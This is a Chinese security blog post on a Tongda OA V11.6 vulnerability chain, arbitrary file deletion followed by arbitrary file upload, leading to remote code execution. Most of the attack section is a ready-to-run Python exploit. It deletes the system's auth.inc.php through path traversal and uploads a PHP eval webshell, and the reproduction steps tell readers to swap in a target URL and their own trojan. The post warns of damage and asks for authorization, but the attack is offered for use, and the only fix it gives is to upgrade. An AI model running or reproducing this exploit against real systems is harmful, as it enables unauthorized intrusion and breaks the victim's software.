🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是_PowerShell，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

目录

🍬 博主介绍

1. 漏洞简介

2.漏洞影响版本

3. 漏洞环境搭建

4. 漏洞复现

5. Exp

6.漏洞修复

1. 漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。

该exp会删除uth.inc.php文件可能回损害oa系统。

2.漏洞影响版本

本漏洞是任意文件删除配合任意文件上传RCE，通达OA高危漏洞影响版本：

文件删除漏洞：通达OA V11.6

任意文件上传：通达OA < V11.7

3. 漏洞环境搭建

/s/1aTYkCD2EolqRUGIGA80aAg?pwd=ujin

通达OA安装包为11.6版本

4. 漏洞复现

将exp中的target替换为目标url

Payload替换为自己的木马即可

然后使用webshell管理工具即可

5. Exp

本POC不是无损利用的，会让对方系统文件被删除导致无法正常工作

并且由于目标系统及网络环境不可控，该漏洞也不可能编写出在任何情况下都完全无损的

EXP使用时请一定一定要慎重，一定要获取对方书面授权再使用如果仅仅想要检测漏洞的存在性

import requeststarget="http://localhost/"payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('deconf.php', payload)}requests.post(url=url,files=files)url=target+"/_deconf.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)else:print("[-]Failed to upload file")

6.漏洞修复

升级官方最新版本